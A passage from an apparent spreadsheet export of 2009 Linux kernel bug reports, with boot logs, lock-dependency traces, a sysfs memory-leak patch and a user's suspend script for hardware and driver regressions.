localhost kernel: ivtv0: info: attempting ioremap at 0xd8000000 len 0x00800000 Apr 18 04:02:22 localhost kernel: ivtv0: info: attempting ioremap at 0xda000000 len 0x00010000 Apr 18 04:02:22 localhost kernel: ivtv0: info: GPIO initial dir: 0000d000 out: 00001000 Apr 18 04:02:22 localhost kernel: ivtv0: info: activating i2c... Apr 18 04:02:22 localhost kernel: cx25840 2-0044: cx25843-24 found @ 0x88 (ivtv i2c driver #0) Apr 18 04:02:22 localhost kernel: ivtv0: info: Allocate DMA encoder MPG stream: 128 x 32768 buffers (4096kB total) Apr 18 04:02:22 localhost kernel: ivtv0: info: Allocate DMA encoder YUV stream: 64 x 32768 buffers (2048kB total) Apr 18 04:02:22 localhost kernel: ivtv0: info: Allocate DMA encoder VBI stream: 61 x 17472 buffers (1040kB total) Apr 18 04:02:22 localhost kernel: ivtv0: info: Allocate DMA encoder PCM stream: 72 x 4608 buffers (324kB total) Apr 18 04:02:22 localhost kernel: ivtv0: Registered device video0 for encoder MPG (4096 kB) Apr 18 04:02:22 localhost kernel: ivtv0: Registered device video32 for encoder YUV (2048 kB) Apr 18 04:02:22 localhost kernel: ivtv0: Registered device vbi0 for encoder VBI (1024 kB) Apr 18 04:02:22 localhost kernel: ivtv0: Registered device video24 for encoder PCM (320 kB) Apr 18 04:02:22 localhost kernel: ivtv0: Registered device radio0 for encoder radio Apr 18 04:02:22 localhost kernel: ivtv0: Initialized card: Yuan PG600-2, GotView PCI DVD Lite Apr 18 04:02:22 localhost kernel: ivtv: End initialization Apr 18 04:02:26 localhost kernel: ivtv0: info: Preparing for firmware halt. Apr 18 04:02:26 localhost kernel: ivtv0: info: Stopping VDM Apr 18 04:02:26 localhost kernel: ivtv0: info: Stopping AO Apr 18 04:02:26 localhost kernel: ivtv0: info: pinging (?) APU Apr 18 04:02:26 localhost kernel: ivtv0: info: Stopping VPU Apr 18 04:02:26 localhost kernel: ivtv0: info: Resetting Hw Blocks Apr 18 04:02:26 localhost kernel: ivtv0: info: Stopping SPU Apr 18 04:02:26 localhost kernel: ivtv0: info: init Encoder SDRAM pre-charge Apr 18 04:02:26 localhost kernel: ivtv0: info: init Encoder SDRAM refresh to 1us Apr 18 04:02:26 localhost kernel: ivtv0: info: Sleeping for 600ms Apr 18 04:02:27 localhost kernel: ivtv0: info: Loading encoder image Apr 18 04:02:27 localhost kernel: ivtv 0000:01:07.0: firmware: requesting v4l-cx2341x-enc.fw Apr 18 04:02:27 localhost kernel: ivtv0: Loaded v4l-cx2341x-enc.fw firmware (376836 bytes) Apr 18 04:02:27 localhost kernel: ivtv0: info: Getting firmware version.. Apr 18 04:02:27 localhost kernel: ivtv0: Encoder revision: 0x02060039 Apr 18 04:02:27 localhost kernel: cx25840 2-0044: firmware: requesting v4l-cx25840.fw Apr 18 04:02:30 localhost kernel: cx25840 2-0044: loaded v4l-cx25840.fw firmware (16382 bytes) Last year's hack suggested by Mauro Carvalho Chehab doesn't help (adding .input1 = 1, to struct xc2028_ctrl of ivtv-driver.c file).</t>
  </si>
  <si>
    <t>ALPS Touchpad not getting recognized anymore</t>
  </si>
  <si>
    <t>2009-04-18 01:30 UTC</t>
  </si>
  <si>
    <t>Pablo López Martín</t>
  </si>
  <si>
    <t>2009-10-20 05:20 UTC</t>
  </si>
  <si>
    <t>Created attachment 21037 [details] dmesg with i8042.debug kernel option I'm using an ALPS Touchpad in my Toshiba Satellite Pro M10. "Advanced features" in X like vertical/horizontal scrolling don't work because kernel doesn't recognize the mouse as a touchpad but as a "PS/2 Generic Mouse". I've looked in launchpad/google/debian bugtrack systems and this problem affects a lot of distros/hardware. All points it's a problem with the input subsystem. I've seen reports of people that say adding i8042.nomux=1 on boot fixes it for them. It doesn't for me. It's not a hardware error (at least in my case) because touchpad works flawless in windows.</t>
  </si>
  <si>
    <t>possible circular locking dependency detected while suspending laptop to S3</t>
  </si>
  <si>
    <t>2009-04-18 11:17 UTC</t>
  </si>
  <si>
    <t>2009-05-16 21:52 UTC</t>
  </si>
  <si>
    <t>AMD64 X2 4200, 1.2GB, laptop Acer Aspire 1511LMi Distro: Bluewhite64 12.1 (64bits port of Slackware 12.1) Last known working version: 2.6.29.1 Kernel compiled with debug options (lock, memory, etc. checking) I tried suspend / resume from ACPI event "lid" and it works, but just before going to S3 the following warning: eth1: associated ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready Clocksource tsc unstable (delta = -183207445 ns) *** INFO FROM REPORTER: here is the last message after normal boot *** *** Now starting to suspend *** ======================================================= [ INFO: possible circular locking dependency detected ] 2.6.30-rc2 #1 ------------------------------------------------------- X/4338 is trying to acquire lock: (events){+.+.+.}, at: [&lt;ffffffff8024ac00&gt;] flush_workqueue+0x0/0x70 but task is already holding lock: (hid_open_mut){+.+...}, at: [&lt;ffffffff80531efc&gt;] usbhid_close+0x2c/0x90 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -&gt; #5 (hid_open_mut){+.+...}: [&lt;ffffffff8025e561&gt;] validate_chain+0xbd1/0x1200 [&lt;ffffffff8025eee9&gt;] __lock_acquire+0x359/0xa50 [&lt;ffffffff8025f634&gt;] lock_acquire+0x54/0x70 [&lt;ffffffff806a9368&gt;] mutex_lock_nested+0x58/0x360 [&lt;ffffffff80531f89&gt;] usbhid_open+0x29/0xb0 [&lt;ffffffff8052db95&gt;] hidinput_open+0x15/0x20 [&lt;ffffffff80504709&gt;] input_open_device+0x99/0xc0 [&lt;ffffffff80507a15&gt;] mousedev_open_device+0x75/0x100 [&lt;ffffffff80507a7a&gt;] mousedev_open_device+0xda/0x100 [&lt;ffffffff80507bdc&gt;] mousedev_open+0x13c/0x1c0 [&lt;ffffffff8050633e&gt;] input_open_file+0xce/0x1a0 [&lt;ffffffff802a1aa5&gt;] chrdev_open+0xe5/0x1d0 [&lt;ffffffff8029ca5d&gt;] __dentry_open+0x10d/0x390 [&lt;ffffffff8029dd6e&gt;] nameidata_to_filp+0x4e/0x60 [&lt;ffffffff802aacaf&gt;] do_filp_open+0x1df/0x8b0 [&lt;ffffffff8029c86e&gt;] do_sys_open+0x5e/0xf0 [&lt;ffffffff8029c92b&gt;] sys_open+0x1b/0x20 [&lt;ffffffff8020b268&gt;] system_call_fastpath+0x16/0x1b [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff -&gt; #4 (&amp;dev-&gt;mutex){+.+.+.}: [&lt;ffffffff8025e561&gt;] validate_chain+0xbd1/0x1200 [&lt;ffffffff8025eee9&gt;] __lock_acquire+0x359/0xa50 [&lt;ffffffff8025f634&gt;] lock_acquire+0x54/0x70 [&lt;ffffffff806a8f5e&gt;] mutex_lock_interruptible_nested+0x6e/0x420 [&lt;ffffffff80504949&gt;] input_register_handle+0x39/0xc0 [&lt;ffffffff803e81a0&gt;] kbd_connect+0x60/0xb0 [&lt;ffffffff80504265&gt;] input_attach_handler+0x65/0xa0 [&lt;ffffffff805069bb&gt;] input_register_handler+0xbb/0x110 [&lt;ffffffff80944539&gt;] kbd_init+0x99/0xe0 [&lt;ffffffff80944767&gt;] vty_init+0x187/0x1d0 [&lt;ffffffff80943db2&gt;] tty_init+0xe2/0x110 [&lt;ffffffff8020903a&gt;] _stext+0x3a/0x160 [&lt;ffffffff8092b8fd&gt;] kernel_init+0x9d/0x100 [&lt;ffffffff8020c16a&gt;] child_rip+0xa/0x20 [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff -&gt; #3 (input_mutex){+.+.+.}: [&lt;ffffffff8025e561&gt;] validate_chain+0xbd1/0x1200 [&lt;ffffffff8025eee9&gt;] __lock_acquire+0x359/0xa50 [&lt;ffffffff8025f634&gt;] lock_acquire+0x54/0x70 [&lt;ffffffff806a8f5e&gt;] mutex_lock_interruptible_nested+0x6e/0x420 [&lt;ffffffff80506680&gt;] input_register_device+0x170/0x210 [&lt;ffffffff805073ac&gt;] input_register_polled_device+0x9c/0xb0 [&lt;ffffffff8049e59e&gt;] b43_rfkill_init+0x17e/0x1b0 [&lt;ffffffff8048d5c1&gt;] b43_op_start+0xc1/0x1a0 [&lt;ffffffff80688b5d&gt;] ieee80211_open+0x2dd/0x7b0 [&lt;ffffffff8059ca32&gt;] dev_open+0x72/0xc0 [&lt;ffffffff8059a6a1&gt;] dev_change_flags+0x91/0x1b0 [&lt;ffffffff805ef84b&gt;] devinet_ioctl+0x5ab/0x740 [&lt;ffffffff805f05dd&gt;] inet_ioctl+0x6d/0x90 [&lt;ffffffff8058bb4a&gt;] sock_ioctl+0xca/0x270 [&lt;ffffffff802ac181&gt;] vfs_ioctl+0x31/0x90 [&lt;ffffffff802ac514&gt;] do_vfs_ioctl+0x334/0x530 [&lt;ffffffff802ac75a&gt;] sys_ioctl+0x4a/0x80 [&lt;ffffffff8020b268&gt;] system_call_fastpath+0x16/0x1b [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff -&gt; #2 (rtnl_mutex){+.+.+.}: [&lt;ffffffff8025e561&gt;] validate_chain+0xbd1/0x1200 [&lt;ffffffff8025eee9&gt;] __lock_acquire+0x359/0xa50 [&lt;ffffffff8025f634&gt;] lock_acquire+0x54/0x70 [&lt;ffffffff806a9368&gt;] mutex_lock_nested+0x58/0x360 [&lt;ffffffff805a54e2&gt;] rtnl_lock+0x12/0x20 [&lt;ffffffff805a6ab9&gt;] linkwatch_event+0x9/0x40 [&lt;ffffffff8024b1ed&gt;] worker_thread+0x1fd/0x2e0 [&lt;ffffffff8024e4d8&gt;] kthread+0x58/0x90 [&lt;ffffffff8020c16a&gt;] child_rip+0xa/0x20 [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff -&gt; #1 ((linkwatch_work).work){+.+.+.}: [&lt;ffffffff8025e561&gt;] validate_chain+0xbd1/0x1200 [&lt;ffffffff8025eee9&gt;] __lock_acquire+0x359/0xa50 [&lt;ffffffff8025f634&gt;] lock_acquire+0x54/0x70 [&lt;ffffffff8024b1e7&gt;] worker_thread+0x1f7/0x2e0 [&lt;ffffffff8024e4d8&gt;] kthread+0x58/0x90 [&lt;ffffffff8020c16a&gt;] child_rip+0xa/0x20 [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff -&gt; #0 (events){+.+.+.}: [&lt;ffffffff8025df72&gt;] validate_chain+0x5e2/0x1200 [&lt;ffffffff8025eee9&gt;] __lock_acquire+0x359/0xa50 [&lt;ffffffff8025f634&gt;] lock_acquire+0x54/0x70 [&lt;ffffffff8024ac48&gt;] flush_workqueue+0x48/0x70 [&lt;ffffffff8024ac80&gt;] flush_scheduled_work+0x10/0x20 [&lt;ffffffff80531f33&gt;] usbhid_close+0x63/0x90 [&lt;ffffffff8052b785&gt;] hidinput_close+0x15/0x20 [&lt;ffffffff80504807&gt;] input_close_device+0x57/0x90 [&lt;ffffffff805078bc&gt;] mousedev_close_device+0x3c/0xc0 [&lt;ffffffff8050792f&gt;] mousedev_close_device+0xaf/0xc0 [&lt;ffffffff80507977&gt;] mousedev_release+0x37/0x60 [&lt;ffffffff8029f98c&gt;] __fput+0xcc/0x260 [&lt;ffffffff8029fe36&gt;] fput+0x16/0x20 [&lt;ffffffff8029c6c8&gt;] filp_close+0x58/0x90 [&lt;ffffffff8029c7a1&gt;] sys_close+0xa1/0x110 [&lt;ffffffff8020b268&gt;] system_call_fastpath+0x16/0x1b [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff other info that might help us debug this: 4 locks held by X/4338: #0: (&amp;mousedev-&gt;mutex/31){+.+...}, at: [&lt;ffffffff8050789b&gt;] mousedev_close_device+0x1b/0xc0 #1: (&amp;mousedev-&gt;mutex#2){+.+...}, at: [&lt;ffffffff8050789b&gt;] mousedev_close_device+0x1b/0xc0 #2: (&amp;dev-&gt;mutex){+.+.+.}, at: [&lt;ffffffff805047dc&gt;] input_close_device+0x2c/0x90 #3: (hid_open_mut){+.+...}, at: [&lt;ffffffff80531efc&gt;] usbhid_close+0x2c/0x90 stack backtrace: Pid: 4338, comm: X Not tainted 2.6.30-rc2 #1 Call Trace: [&lt;ffffffff8025d7d4&gt;] print_circular_bug_tail+0x94/0xf0 [&lt;ffffffff8025df72&gt;] validate_chain+0x5e2/0x1200 [&lt;ffffffff8025eee9&gt;] __lock_acquire+0x359/0xa50 [&lt;ffffffff8025f634&gt;] lock_acquire+0x54/0x70 [&lt;ffffffff8024ac00&gt;] ? flush_workqueue+0x0/0x70 [&lt;ffffffff8024ac48&gt;] flush_workqueue+0x48/0x70 [&lt;ffffffff8024ac00&gt;] ? flush_workqueue+0x0/0x70 [&lt;ffffffff8025c46d&gt;] ? trace_hardirqs_on+0xd/0x10 [&lt;ffffffff8024ac80&gt;] flush_scheduled_work+0x10/0x20 [&lt;ffffffff80531f33&gt;] usbhid_close+0x63/0x90 [&lt;ffffffff8052b785&gt;] hidinput_close+0x15/0x20 [&lt;ffffffff80504807&gt;] input_close_device+0x57/0x90 [&lt;ffffffff805078bc&gt;] mousedev_close_device+0x3c/0xc0 [&lt;ffffffff8050792f&gt;] mousedev_close_device+0xaf/0xc0 [&lt;ffffffff80507977&gt;] mousedev_release+0x37/0x60 [&lt;ffffffff8029f98c&gt;] __fput+0xcc/0x260 [&lt;ffffffff8029fe36&gt;] fput+0x16/0x20 [&lt;ffffffff8029c6c8&gt;] filp_close+0x58/0x90 [&lt;ffffffff8029c7a1&gt;] sys_close+0xa1/0x110 [&lt;ffffffff8020b268&gt;] system_call_fastpath+0x16/0x1b eth1: deauthenticating by local choice (reason=3) PM: Syncing filesystems ... done. Freezing user space processes ... (elapsed 0.01 seconds) done. Freezing remaining freezable tasks ... (elapsed 0.00 seconds) done. Suspending console(s) (use no_console_suspend to debug) parport_pc 00:0b: disabled b43-pci-bridge 0000:02:08.0: PCI INT A disabled ACPI handle has no context! Intel ICH Modem 0000:00:06.1: PCI INT B disabled Intel ICH 0000:00:06.0: PCI INT A disabled ehci_hcd 0000:00:02.2: PCI INT C disabled ehci_hcd 0000:00:02.2: PME# disabled ohci_hcd 0000:00:02.1: PCI INT B disabled ohci_hcd 0000:00:02.1: PME# disabled ohci_hcd 0000:00:02.0: PCI INT A disabled ohci_hcd 0000:00:02.0: PME# disabled ACPI: Preparing to enter system sleep state S3 x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106 *** NOTE FROM REPORTER : Thawing the laptop now (reopening the lid) *** Back to C! ACPI: Waking up from system sleep state S3 ohci_hcd 0000:00:02.0: restoring config space at offset 0x1 (was 0xb00007, writing 0xb00003) ohci_hcd 0000:00:02.1: restoring config space at offset 0x1 (was 0xb00007, writing 0xb00003) ehci_hcd 0000:00:02.2: restoring config space at offset 0xd (was 0x80, writing 0x44) ehci_hcd 0000:00:02.2: restoring config space at offset 0x1 (was 0xb00006, writing 0xb00002) Intel ICH 0000:00:06.0: restoring config space at offset 0x1 (was 0xb00007, writing 0xb00003) Intel ICH Modem 0000:00:06.1: restoring config space at offset 0x1 (was 0xb00007, writing 0xb00003) pci 0000:00:0a.0: restoring config space at offset 0x9 (was 0xfff0, writing 0x63f06000) pci 0000:00:0a.0: restoring config space at offset 0x7 (was 0x2803030, writing 0x82803030) pci 0000:00:0a.0: restoring config space at offset 0x6 (was 0x80020200, writing 0x80060200) etc. For more info, just to make suspend working on this laptop, the following sequence is issued on the lid event (from a custom hibernate.sh script): ... # Switch to virtual terminal 1 to avoid graphics corruption in X chvt 1 # Prevent double power event: touch /var/state/hibernating # Stops network: /etc/rc.d/rc.inet1 eth1_stop # Flush all data to disk (just in case) LD_PRELOAD="" sync # Save the system time hwclock --systohc --utc # Suspend echo -n mem &gt; /sys/power/state # 2.6.25 does not send lid event at resume: rm -rf /var/state/hibernating # Restore the system time hwclock --hctosys --utc # Reset the graphic card vbetool post # Reset the CD/DVD drive hdparm -w /dev/hdc # Reset audio alsactl restore # Starts network: /usr/sbin/wifi &amp; # Switch back to X chvt 7 ... So suspension is done from the console even if X was started. Using nv free driver, no tainting. Regards</t>
  </si>
  <si>
    <t>_PPC used for thermals - Thinkpad T60</t>
  </si>
  <si>
    <t>2009-04-20 04:45 UTC</t>
  </si>
  <si>
    <t>2011-07-31 20:58 UTC</t>
  </si>
  <si>
    <t>Created attachment 21049 [details] acpidump Filing this bug to document the trail of the T60's use of P-states for thermal management.</t>
  </si>
  <si>
    <t>Possible memory leak in fs/sysfs/symlink.c</t>
  </si>
  <si>
    <t>2009-04-22 17:59 UTC</t>
  </si>
  <si>
    <t>Armin Kuster</t>
  </si>
  <si>
    <t>2009-07-20 14:38 UTC</t>
  </si>
  <si>
    <t>There is the possiblity of a memory leak if a page is allocated and if sysfs_gee tlink() fails in the sysfs_follow_link. I think a simple error check like should do the trick. diff --git a/fs/sysfs/symlink.c b/fs/sysfs/symlink.c index a3ba217..d916cb8 100644 --- a/fs/sysfs/symlink.c +++ b/fs/sysfs/symlink.c @@ -194,6 +194,9 @@ static void *sysfs_follow_link(struct dentry *dentry, struct unsigned long page = get_zeroed_page(GFP_KERNEL); if (page) error = sysfs_getlink(dentry, (char *) page); + if (error &lt; 0) + free_page((unsigned long)page); + nd_set_link(nd, error ? ERR_PTR(error) : (char *)page); return NULL; }</t>
  </si>
  <si>
    <t>Warning about reiserfs</t>
  </si>
  <si>
    <t>2.6.30-rc3</t>
  </si>
  <si>
    <t>2009-04-22 19:07 UTC</t>
  </si>
  <si>
    <t>2009-05-16 21:01 UTC</t>
  </si>
  <si>
    <t>maluta 13295 13299 13301</t>
  </si>
  <si>
    <t>I don't know if it's relevant or should I ignore it, but I'm reporting it anyway (everything is working fine here... I have no problems with reiser)... If it's harmless, please discard my bug report. Thanks. Apr 22 15:29:59 tux kernel: REISERFS (device sda2): found reiserfs format "3.6" with standard journal Apr 22 15:29:59 tux kernel: REISERFS (device sda2): using ordered data mode Apr 22 15:29:59 tux kernel: REISERFS (device sda2): journal params: device sda2, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 Apr 22 15:29:59 tux kernel: REISERFS (device sda2): checking transaction log (sda2) Apr 22 15:29:59 tux kernel: REISERFS (device sda2): Using r5 hash to sort names Apr 22 15:29:59 tux kernel: ------------[ cut here ]------------ Apr 22 15:29:59 tux kernel: WARNING: at fs/namei.c:1251 lookup_one_len+0x108/0x120() Apr 22 15:29:59 tux kernel: Hardware name: System Product Name Apr 22 15:29:59 tux kernel: Modules linked in: Apr 22 15:29:59 tux kernel: Pid: 1, comm: swapper Not tainted 2.6.30-rc3 #1 Apr 22 15:29:59 tux kernel: Call Trace: Apr 22 15:29:59 tux kernel: [&lt;ffffffff80239097&gt;] warn_slowpath+0xa7/0xe0 Apr 22 15:29:59 tux kernel: [&lt;ffffffff802396c0&gt;] ? release_console_sem+0x1b0/0x200 Apr 22 15:29:59 tux kernel: [&lt;ffffffff80309dbb&gt;] ? prepare_error_buf+0x57b/0x680 Apr 22 15:29:59 tux kernel: [&lt;ffffffff80317248&gt;] ? do_journal_end+0x1e8/0xf50 Apr 22 15:29:59 tux kernel: [&lt;ffffffff80318e91&gt;] ? do_journal_begin_r+0x111/0x330 Apr 22 15:29:59 tux kernel: [&lt;ffffffff802a9798&gt;] lookup_one_len+0x108/0x120 Apr 22 15:29:59 tux kernel: [&lt;ffffffff8031b1d5&gt;] reiserfs_xattr_init+0x45/0xb0 Apr 22 15:29:59 tux kernel: [&lt;ffffffff80308b75&gt;] reiserfs_fill_super+0x7f5/0xb20 Apr 22 15:29:59 tux kernel: [&lt;ffffffff802a0300&gt;] ? test_bdev_super+0x0/0x20 Apr 22 15:29:59 tux kernel: [&lt;ffffffff802a1a27&gt;] get_sb_bdev+0x157/0x1a0 Apr 22 15:29:59 tux kernel: [&lt;ffffffff80308380&gt;] ? reiserfs_fill_super+0x0/0xb20 Apr 22 15:29:59 tux kernel: [&lt;ffffffff80306393&gt;] get_super_block+0x13/0x20 Apr 22 15:29:59 tux kernel: [&lt;ffffffff802a1516&gt;] vfs_kern_mount+0x76/0x180 Apr 22 15:29:59 tux kernel: [&lt;ffffffff802a168d&gt;] do_kern_mount+0x4d/0x110 Apr 22 15:29:59 tux kernel: [&lt;ffffffff802b9234&gt;] do_mount+0x344/0x8b0 Apr 22 15:29:59 tux kernel: [&lt;ffffffff802b9834&gt;] sys_mount+0x94/0xf0 Apr 22 15:29:59 tux kernel: [&lt;ffffffff80573e0c&gt;] mount_block_root+0xdb/0x27f Apr 22 15:29:59 tux kernel: [&lt;ffffffff80574006&gt;] mount_root+0x56/0x5a Apr 22 15:29:59 tux kernel: [&lt;ffffffff8057413e&gt;] prepare_namespace+0x134/0x161 Apr 22 15:29:59 tux kernel: [&lt;ffffffff805736d7&gt;] kernel_init+0x17b/0x18b Apr 22 15:29:59 tux kernel: [&lt;ffffffff8020c3ea&gt;] child_rip+0xa/0x20 Apr 22 15:29:59 tux kernel: [&lt;ffffffff8057355c&gt;] ? kernel_init+0x0/0x18b Apr 22 15:29:59 tux kernel: [&lt;ffffffff8020c3e0&gt;] ? child_rip+0x0/0x20 Apr 22 15:29:59 tux kernel: ---[ end trace bd740a0e89f40a36 ]--- Apr 22 15:29:59 tux kernel: VFS: Mounted root (reiserfs filesystem) on device 8:2.</t>
  </si>
  <si>
    <t>Panic while reboot/halt in nf_conntrack_helper_unregister()</t>
  </si>
  <si>
    <t>2009-04-22 20:58 UTC</t>
  </si>
  <si>
    <t>2009-04-25 21:10 UTC</t>
  </si>
  <si>
    <t>Created attachment 21084 [details] kernel panic message Not syncing while reboot/halt. See attached screenshot.</t>
  </si>
  <si>
    <t>keyboard backlight brightness up/down keys doesn't work</t>
  </si>
  <si>
    <t>2009-04-23 20:46 UTC</t>
  </si>
  <si>
    <t>2009-05-24 10:55 UTC</t>
  </si>
  <si>
    <t>hald-addon-macbookpro-backlight abnormally ends after pressing keyboard backlight brightness up/down keys. 1. Start hald: $ ps -A f 4094 ? Ss 0:00 hald 4095 ? S 0:00 \_ hald-runner 4190 ? S 0:00 \_ /usr/libexec/hald-addon-macbookpro-backlight 4203 ? S 0:00 \_ hald-addon-input: Listening on /dev/input/event11 /dev/input/event9 /dev/input/event8 /dev/input/event3 /dev/input/event1 4216 ? S 0:00 \_ /usr/libexec/hald-addon-cpufreq 4217 ? S 0:00 \_ hald-addon-acpi: listening on acpid socket /var/run/acpid.socket 4221 ? S 0:00 \_ hald-addon-storage: polling /dev/sr0 (every 2 sec) 2. Press keyboard backlight up or down key: [ 3006.019628] hald-addon-macb[4190] general protection ip:804962b sp:bffe0fa0 error:0 in hald-addon-macbookpro-backlight[8048000+3000] 2.6.29.1 works ok with applesmc driver.</t>
  </si>
  <si>
    <t>Dell Vostro laptop, keyboard does not work after startup occasionally</t>
  </si>
  <si>
    <t>2009-04-24 20:52 UTC</t>
  </si>
  <si>
    <t>Jan Vcelak</t>
  </si>
  <si>
    <t>2012-05-30 16:24 UTC</t>
  </si>
  <si>
    <t>Created attachment 21104 [details] kernel configuration I have Dell Vostro 1510 laptop. From time to time, immediately after starting Linux the keyboard and touchpad stop responding. It's necessary to reboot the computer and it starts working again. (Sometimes two reboots are needed.) I experience this problem since I have this laptop (July 2008). According to uncle Google some other people have similar difficulties - but I didn't managed to find any solution (various i8042.* kernel parameters just don't work). The keyboard works before starting and in bootloader. USB keyboard works at any time. How to reproduce: 1) Start the laptop after shutdown and boot into Linux. 2) If the keyboard is responding turn off the computer and try it again. It really appears from time to time - last month it didn't. But yesterday it did twice and today once. I've tried LILO, GRUB and GRUB2 to find out whether it is bootloader's fault or not. But it's always the same. I will try to give you as much information as I can. Because the necessary reboots are really very annoying. And unfortunately unpredictable - it appears whenever you need it the least. I'm attaching kernel configuration file, dmesg output for not-working keyboard and dmesg for working-keyboard. I use vanilla kernel but I had the same problem with distributional kernels in Ubuntu 8.04-9.04 and Fedora 10. Some very similar problem is reported in RedHat Bugzilla https://bugzilla.redhat.com/show_bug.cgi?id=473283 - maybe it should be helpful.)</t>
  </si>
  <si>
    <t>Can't build sparc64 non-smp kernel with kgdb enabled</t>
  </si>
  <si>
    <t>2009-04-24 21:24 UTC</t>
  </si>
  <si>
    <t>Michael Casadevall</t>
  </si>
  <si>
    <t>2012-05-30 16:25 UTC</t>
  </si>
  <si>
    <t>I'm working to upgrade the SPARC kernels for Ubuntu Karmic 9.10, and I ran into trouble building the sparc64 non-smp one with KGDB enabled. In arch/sparc/kernel/ttable.S, the kernel explodes with a linker error on smp_kgdb_capture_client which doesn't exist if CONFIG_SMP is not set. The problematic code is here: Line 67: #ifdef CONFIG_KGDB tl0_irq8: TRAP_IRQ(smp_kgdb_capture_client, 8) #else tl0_irq8: BTRAP(0x48) #endif I believe commit 42cc77c861e8e850e86252bb5b1e12e006261973 is the commit that broke this for non-SMP, but I'm not versed enough in sparc's architecture specific bits to suggest a proper fix.</t>
  </si>
  <si>
    <t>2.6.30-rc2 soft lockups: ACPI?  clock source problem?</t>
  </si>
  <si>
    <t>2009-04-25 11:23 UTC</t>
  </si>
  <si>
    <t>2009-05-13 10:55 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc2 soft lockups: ACPI? clock source problem? Submitter : Dave Hansen &lt;dave@sr71.net&gt; Date : 2009-04-21 17:30 References : http://marc.info/?l=linux-kernel&amp;m=124033550127455&amp;w=4 Handled-By : john stultz &lt;johnstul@us.ibm.com&gt; Handled-By : Len Brown &lt;lenb@kernel.org&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.30-rc3 : Regression: i915 , video</t>
  </si>
  <si>
    <t>2009-04-25 11:30 UTC</t>
  </si>
  <si>
    <t>2009-06-04 12:00 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc3 : Regression: i915 , video Submitter : We La &lt;w.landgraf@yahoo.com&gt; Date : 2009-04-23 19:19 References : http://marc.info/?l=linux-kernel&amp;m=124051473119134&amp;w=4 References : http://marc.info/?l=linux-kernel&amp;m=124062673404329&amp;w=4 Handled-By : Len Brown &lt;lenb@kernel.org&gt; Patch : http://patchwork.kernel.org/patch/18420/ This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.30-rc2 + xorg-intel-2.7.0 + DRM_I915_KMS = corruption</t>
  </si>
  <si>
    <t>2009-04-25 19:12 UTC</t>
  </si>
  <si>
    <t>2009-05-25 23:23 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc2 + xorg-intel-2.7.0 + DRM_I915_KMS = corruption Submitter : Alex Bennee &lt;kernel-hacker@bennee.com&gt; Date : 2009-04-19 6:27 References : http://marc.info/?l=linux-kernel&amp;m=124022460014812&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NULL pointer crash in early NMI handler</t>
  </si>
  <si>
    <t>2.6.30-rc</t>
  </si>
  <si>
    <t>2009-04-25 19:23 UTC</t>
  </si>
  <si>
    <t>2009-05-16 21:56 UTC</t>
  </si>
  <si>
    <t>Subject : NULL pointer crash in early NMI handler Submitter : Steven Rostedt &lt;rostedt@goodmis.org&gt; Date : 2009-04-21 1:35 References : http://marc.info/?l=linux-kernel&amp;m=124027774713368&amp;w=4 Handled-By : Rusty Russell &lt;rusty@rustcorp.com.au&gt; Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; Patch : http://patchwork.kernel.org/patch/19141/ Patch : http://patchwork.kernel.org/patch/19140/ This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>IO-APIC + timer doesn't work!</t>
  </si>
  <si>
    <t>2009-04-25 19:43 UTC</t>
  </si>
  <si>
    <t>2009-05-05 21:59 UTC</t>
  </si>
  <si>
    <t>Subject : IO-APIC + timer doesn't work! Submitter : Jeff Mahoney &lt;jeffm@suse.com&gt; Date : 2009-04-17 15:15 References : http://marc.info/?l=linux-kernel&amp;m=123998145109946&amp;w=4 Handled-By : Andreas Herrmann &lt;andreas.herrmann3@amd.com&gt; Patch : http://patchwork.kernel.org/patch/19378/ Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Crash in v2.6.30-rc3 (regression from 30-rc2)</t>
  </si>
  <si>
    <t>2009-04-25 20:07 UTC</t>
  </si>
  <si>
    <t>2009-05-13 10:41 UTC</t>
  </si>
  <si>
    <t>Subject : Crash in v2.6.30-rc3 (regression from 30-rc2) Submitter : Gregory Haskins &lt;ghaskins@novell.com&gt; Date : 2009-04-23 2:29 References : http://marc.info/?l=linux-kernel&amp;m=124045383628477&amp;w=4 References : http://marc.info/?l=linux-kernel&amp;m=124033993702882&amp;w=4 Notify-Also : Balbir Singh &lt;balbir@linux.vnet.ibm.com&gt; Notify-Also : Steve Wise &lt;swise@opengridcomputing.com&gt; Notify-Also : Andrew Morton &lt;akpm@linux-foundation.org&gt; Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Apple wireless Mighty Mouse has inverted horizontal scrolling</t>
  </si>
  <si>
    <t>2009-04-25 20:08 UTC</t>
  </si>
  <si>
    <t>Martey Dodoo</t>
  </si>
  <si>
    <t>2010-02-23 22:57 UTC</t>
  </si>
  <si>
